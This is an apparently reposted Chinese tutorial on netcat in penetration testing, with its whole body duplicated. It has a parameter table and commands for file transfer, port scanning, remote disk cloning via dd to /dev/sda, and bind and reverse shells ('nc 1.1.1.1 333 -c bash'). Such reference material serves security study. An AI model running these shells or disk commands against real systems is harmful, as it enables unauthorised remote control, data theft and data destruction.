NetCat(NC)在渗透测试中的常见应用以及中文版参数解释
2018-03-21 21:00
344 查看
NetCat简称NC,是一款体积小巧但功能十分强大的网络工具,享有网络工具中的“瑞士军刀”之称,深得网络安全从业者的喜爱,在此我总结以下NetCat在渗透测试和部分其他情景下的使用方法:
1.作为文本传输工具
2.作为文件的传输工具
3.加密传输文件
4.加密数据流量
5.远程克隆硬盘
6.作为木马进行远程控制
7.作为流媒体服务器
参数中文对照
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], upto 8
-G num source-routing pointer: 4, 8, 12,...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示法可写为M-N的范围格式。
NC-传输文本信息
A:nc -l -p 6666
B:nc -nv 1.1.1.1 6666
More Lsof
NC传输文件和目录
传输文件
A: nc -lp 333 > 1.txt
B: nc -nv 1.1.1.1 <1.txt
或者:
A: nc -lp 333 < 1.txt
B: nc -nv 1.1.1.1 >1.txt
传输目录
A:tar -cvf - music/ | nc -lp 333
B:nc -nv 1.1.1.1 333 | tar -xvf
传输加密文件
A:nc -lp 333 | mcrypt --flush -Fbqd -arjindael256 -m ecb >1.txt
B:mcrypt –flush -Fbq -a rjindael256 -m ecb| nc -nv 1.1.1.1 333
NC-流媒体服务
A:cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11-cache 3000-
NC-端口扫描
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024
NC-远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B:dd if=/dev/sda |nc -nv 1.1.1.1 333
NC-远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash
1.作为文本传输工具
2.作为文件的传输工具
3.加密传输文件
4.加密数据流量
5.远程克隆硬盘
6.作为木马进行远程控制
7.作为流媒体服务器
参数中文对照
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], upto 8
-G num source-routing pointer: 4, 8, 12,...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示法可写为M-N的范围格式。
NC-传输文本信息
A:nc -l -p 6666
B:nc -nv 1.1.1.1 6666
More Lsof
NC传输文件和目录
传输文件
A: nc -lp 333 > 1.txt
B: nc -nv 1.1.1.1 <1.txt
或者:
A: nc -lp 333 < 1.txt
B: nc -nv 1.1.1.1 >1.txt
传输目录
A:tar -cvf - music/ | nc -lp 333
B:nc -nv 1.1.1.1 333 | tar -xvf
传输加密文件
A:nc -lp 333 | mcrypt --flush -Fbqd -arjindael256 -m ecb >1.txt
B:mcrypt –flush -Fbq -a rjindael256 -m ecb| nc -nv 1.1.1.1 333
NC-流媒体服务
A:cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11-cache 3000-
NC-端口扫描
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024
NC-远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B:dd if=/dev/sda |nc -nv 1.1.1.1 333
NC-远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash
相关文章推荐
- kali linux 渗透测试 第五章 netcat--nc
- TensorFlow学习记录-- 6.百度warp-ctc 参数以及测试例子2解释
- angular-cli.json配置参数解释,以及依稀常用命令的通用关键参数解释
- 移动APP安全在渗透测试中的应用
- 应用的归档打包以及distribution测试和上传到App Store
- 梯度优化算法总结以及solver中相关参数解释
- nginx 常见参数以及重定向参数配置
- Linux下文件 ~/.bashrc 中参数HISTFILESIZE 与 HISTSIZE 的解释与区别以及HISTTIMEFORMAT参数的配置
- word2vec的示例以及参数解释
- paip.提升性能---mysql 性能 测试以及 参数调整.txt
- 【推荐】Sql Server 不常见应用之一:获取表的基本信息、字段列表、存储过程参数列表
- jvm gc参数解释以及提供系统堆益处日志监控方法
- 解析sizeof, strlen, 指针以及数组作为函数参数的应用
- #####好好好#####tensorflow conv2d的padding解释以及参数解释
- nginx 常见参数以及重定向参数配置
- iOS 9应用开发教程之定制应用程序图标以及真机测试
- javascript中bind()函数实现和应用以及多次bind的结果和参数位置的思考
- MapReduce优化----参数的解释以及设置
- 获得数据库的元数据与参数的元数据以及应用